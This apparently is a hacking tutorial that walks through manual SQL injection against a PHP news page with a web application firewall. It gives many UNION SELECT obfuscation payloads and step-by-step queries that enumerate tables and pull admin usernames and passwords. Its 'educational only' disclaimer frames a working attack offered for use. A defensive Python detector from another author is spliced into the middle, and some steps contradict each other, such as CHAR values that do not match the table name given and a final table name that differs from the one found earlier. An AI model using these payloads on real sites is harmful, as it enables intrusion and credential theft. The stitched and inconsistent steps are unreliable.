NOTE: Hacking is an illegal activity, so don't try this on anyone. This tutorial is only for educational purposes. If you want to use this tutorial for any other purpose, please stop reading.
WAF Bypass Manual SQL injection
http://www.targetsite.com/news.php?id=11
Add a single quote (') at the end of the URL.
http://www.targetsite.com/news.php?id=11'
And get a MySQL error.
Let's balance our query for further injecting.
http://www.targetsite.com/news.php?id=11--
http://www.targetsite.com/news.php?id=11--+
http://www.targetsite.com/news.php?id=11-- -
http://www.targetsite.com/news.php?id=11%23
http://www.targetsite.com/news.php?id=11;
Here is a small explanation of balancing and commenting in our injection.
After balancing our query, the next step is to count the total number of columns.
http://www.targetsite.com/news.php?id=11 order by 1--+
No error!
http://www.targetsite.com/news.php?id=11 order by 3--+
No error!
http://www.targetsite.com/news.php?id=11 order by 5--+
Again no error!
http://www.targetsite.com/news.php?id=11 order by 6--+
Here we get an error:
Unknown column '6' in 'order clause'
Now try to find our vulnerable columns.
http://www.targetsite.com/news.php?id=-11 Union Select 1,2,3,4,5--+
If our target site is protected with a WAF, the WAF will block our query and give us a Mod_Security error.
So here are some WAF bypassing methods.
• /*!%55NiOn*/ /*!%53eLEct*/
• %55nion(%53elect 1,2,3)-- -
• +union+distinct+select+
• +union+distinctROW+select+
• /**//*!12345UNION SELECT*//**/
• /**//*!50000UNION SELECT*//**/
• /**/UNION/**//*!50000SELECT*//**/
• /*!50000UniON SeLeCt*/
• union /*!50000%53elect*/
• +#uNiOn+#sEleCt
• +#1q%0AuNiOn all#qa%0A#%0AsEleCt
• /*!u%6eion*/ /*!se%6cect*/
• +un/**/ion+se/**/lect
• uni%0bon+se%0blect
• %2f**%2funion%2f**%2fselect
• union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
• REVERSE(noinu)+REVERSE(tceles)
• /*--*/union/*--*/select/*--*/
• union (/*!/**/ SeleCT */ 1,2,3)
• /*!union*/+/*!select*/
• union+/*!select*/
• /**/union/**/select/**/
• /**/uNIon/**/sEleCt/**/
• /**//*!union*//**//*!select*//**/
• /*!uNIOn*/ /*!SelECt*/
Just change the Union Select with the following bypass URLs.
Now check the vulnerable columns. We use ( - ) for finding vulnerable columns.
We can also check vulnerable columns with other methods instead of just using (-).
Here are some vulnerable-column checking methods with examples.
Using And 0
http://www.targetsite.com/news.php?id=11 and 0 Union Select 1,2,3,4,5--+
Using And False
http://www.targetsite.com/news.php?id=11 and false Union Select 1,2,3,4,5--+
Using Div 0
http://www.targetsite.com/news.php?id=11 Div 0 Union Select 1,2,3,4,5--+
Using null
http://www.targetsite.com/news.php?id=null Union Select 1,2,3,4,5--+
Using .1337
http://www.targetsite.com/news.php?id=11.1337 Union Select 1,2,3,4,5--+
Using -
http://www.targetsite.com/news.php?id=-11 Union Select 1,2,3,4,5--+
We will get our vulnerable columns printed on the page. 3 is our vulnerable column.
http://www.targetsite.com/news.php?id=-11 Union Select 1,2,@@version,4,5--+
We can see the current version printed on the page.
The next step is to get the tables.
http://www.targetsite.com/news.php?id=-11 Union Select 1,2,concat(table_name),4,5 from information_schema.tables where table_schema=database()--+
We can see the total tables in our primary database.
Now, if you want to get the admin details of the target site, check the table name of admin, then encode the admin table name in MySQL Char() to get the columns in the admin table.
Change table_name to column_name, information_schema.tables to information_schema.columns, and table_schema to table_name. And replace database() with our MySQL Char() admin value.
http://www.targetsite.com/news.php?id=-11 Union Select 1,2,concat(column_name),4,5 from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)--+
We can see the column names on the page, like id, username, pass.
To get the data from the columns, here is our final query.
http://www.targetsite.com/news.php?id=-11 Union Select 1,2,concat(username,0x3a,password),4,5 from admin--+
2nd Method WAF Bypass Manual SQL Injection
http://www.targetsite.co.in/news.php?id=189'
This section again! Now write
http://www.targetsite.co.in/news.php?id=189 order by 1--+-
Does the page remain the same?
http://www.targetsite.co.in/news.php?id=189' order by 2--+-
Same?
Continue this until an error is displayed on the page!
http://www.targetsite.co.in/news.php?id=189' order by 4--+-
Same!
http://www.area96.it/news.php?nws=61' order by 5--+-
Unknown column! That means there is no column 5 in this, so there are 4 columns!
We got the column count; now we will find the vulnerable column! Write
http://www.targetsite.co.in/news.php?id=-189 union select 1,2,3,4--+-
Oops, 403 forbidden! mod security :P
Now we will bypass this. Actually, certain words are forbidden, like select! When you hit enter, the request has to go through the firewall, and since select is forbidden it will deny the command. So we have to trick it by using our brain.
In the database, symbols like / * ! ` ~ ( ) are not supported! So if we add an extra symbol along with select, the firewall will allow it, so we can trick it!
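Seen from the defending side, the bypass list above and the explanation here come down to one fact: a filter that matches keywords in the raw request sees different bytes than MySQL's lexer does. The following added example (my own code, not from this tutorial) canonicalizes a query string the way the lexer will read it, percent-decoding it and resolving /*! */, /* */, # and -- comments, and then runs detection signatures over the result; the sample query strings are constructed in the shapes this page shows and are not captured traffic.

```python
import re
from urllib.parse import unquote_plus

SAMPLES = {  # constructed query strings in the shapes this page shows, not captured traffic
    "plain":   "id=-11 Union Select 1,2,3,4,5--+",
    "inline":  "id=-189 union /*!select*/ 1,2,3,4--",
    "encoded": "id=-11 /*!%55NiOn*/ /*!%53eLEct*/ 1,2,3",
    "schema":  "id=189 union /*!select*/1,concat/*!(table_name)*/,3,4 from Information_schema/**/.tables where table_schema=database()--+-",
    "orderby": "id=11 order by 6--+",
    "benign":  "id=11&page=2",
}

def keyword_waf(raw: str) -> bool:
    """A keyword match on the raw request, the kind of filter the page's payloads slip past."""
    return re.search(r"union\s+select", raw, re.I) is not None

def canonicalize(raw: str) -> str:
    """Rewrite a query string into the token stream MySQL's lexer will actually see."""
    s = unquote_plus(unquote_plus(raw))  # decode twice (%2f**%2f hides delimiters); '+' becomes space
    out, i, n = [], 0, len(s)
    while i < n:
        if s.startswith("/*!", i):                    # versioned comment: MySQL runs its body
            i += 3
            while i < n and s[i].isdigit():           # skip the optional version number (50000)
                i += 1
        elif s.startswith("/*", i):                   # ordinary comment: a token separator
            j = s.find("*/", i + 2)
            i = n if j < 0 else j + 2
        elif s[i] == "#" or s.startswith("-- ", i):   # line comment runs to end of line
            j = s.find("\n", i)
            i = n if j < 0 else j + 1
        elif s.startswith("*/", i):                   # closes the versioned comment above
            i += 2
        else:
            out.append(s[i])
            i += 1
            continue
        out.append(" ")                               # every comment delimiter acts as whitespace
    return re.sub(r"\s+", " ", "".join(out)).strip().lower()

SIGNATURES = {"union_select": r"\bunion\b.*\bselect\b",
              "column_count": r"\border by \d+",
              "schema_read":  r"\binformation_schema\s*\."}

def classify(raw: str) -> list:
    """Names of the probe patterns present once the request is canonicalized."""
    c = canonicalize(raw)
    return [name for name, rx in SIGNATURES.items() if re.search(rx, c, re.S)]
```

Running `classify` over `SAMPLES` flags every probe that `keyword_waf` misses, which is the reason detection belongs on the canonical form (or, better, on parameterized queries that make the keywords harmless).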
http://www.targetsite.co.in/news.php?id=-189 union /*!select*/ 1,2,3,4--
Bypassed :P
Now you can see 2 3 4 on the page as the vulnerable columns! These three numbers are displayed on the page, which means they are the vulnerable columns!
Now we will use these numbers to display the username and password of the website admin panel on the page!
Now just change a little thing here! Choose any number from the vulnerable columns and change it to "group_concat(table_name)", like I do:
http://www.targetsite.co.in/news.php?id=189union select 1,group_concat(table_name),3,4--+-
And after 6 add "from Information_schema.tables", like this:
http://www.targetsite.co.in/news.php?id=189 union /*!select*/ 1,group_concat(table_name),3,4 from Information_schema.tables--+-
Now hit enter.
Oops, again 403 forbidden! We need to trick some more words!
http://www.targetsite.co.in/news.php?id=189 union /*!select*/1,group_concat/*!(table_name)*/,3,4 from Information_schema/**/.tables--+-
function group_concat does not exist O_o
It seems like group_concat is not working, so we will use only concat now.
http://www.targetsite.co.in/news.php?id=189 union /*!select*/1,concat/*!(table_name)*/,3,4 from Information_schema/**/.tables--+-
Bypassed!
Now instead of the number 2 column it will show table names, like this one:
CHARACTER_SETS,COLLATIONS,COLLATION_CHARACTER_SET
This means it is showing us the table names! But we need the username and password, which are located in the database of the website, so we will use database() as well to extract the username and password!
http://www.targetsite.co.in/news.php?id=189 union /*!select*/1,concat/*!(table_name)*/,3,4 from Information_schema/**/.tables--+-
Just add one more part after information_schema.tables, which is "where table_schema=database()", like this:
http://www.targetsite.co.in/news.php?id=189 union /*!select*/1,concat/*!(table_name)*/,3,4 from Information_schema/**/.tables where table_schema=database()--+-
Now on the page it is showing the database's tables:
Adminlogin
These are the tables. Now we will send the query to open the adminlogin table!
Change "(table_name)" to "(column_name)", "information_schema.tables" to "information_schema.columns", "table_schema" to "table_name", and "database()" to "login".
But it will not work, because it will not accept the name of a table after the "Table_name=" command, so we need to trick the site. We will use decimal numbers instead of the table name! We will convert the word Login to decimal numbers so it will accept it!
For this you can use this site:
http://www.branah.com/ascii-converter
From here you can convert any word to hex, decimal and binary, so we will type L o g i n in the ASCII converter box! Give a space between every letter of login, because the website needs spaced numbers! And click on convert! It is now showing us the result in the decimal box, which is
97 100 109 105 110 108 111 103 105 110
Now change it to
CHAR(97, 100, 109, 105, 110, 108, 111, 103, 105, 110)
Just add "CHAR" and a comma after every 3 numbers! Now we will use this instead of login! So it will be
http://www.targetsite.co.in/news.php?id=189 union /*!select*/1,concat/*!(column_name)*/,3,4 from Information_schema/**/.columns where table_name=CHAR(97, 100, 109, 105, 110, 108, 111, 103, 105,110)--+-
Oops, again 403: table_name is forbidden.
Bypass:
http://www.targetsite.co.in/news.php?id=189 union /*!select*/1,concat/*!(column_name)*/,3,4 from Information_schema/**/.columnswhere /*!table_name*/=CHAR(97, 100, 109, 105, 110, 108, 111, 103,105, 110)--+-
The page shows the result:
usnd pdgame
This means these are the columns of the table adminlogin.
Now we will simply send the query to give us the username and password on the page! Just change "(column_name)" to "(usnd,0x3a,pdgame)", and after "from" remove all the words and add "adminlogin". 0x3a is the converted form of : to get separate answers for the username and password! And it would be
http://www.targetsite.co.in/news.php?id=189 union /*!select*/1,concat/*!(usnd,0x3a,pdgame)*/,3,4 from admin--+-
The page shows this result:
admin: admin123
This means the 1st user is
username=admin
password=admin123
Legal Disclaimer: This tutorial is completely for educational purposes only. For any misuse of this tutorial by any means, the author will not be held responsible.
If you have any queries, please comment on my posts.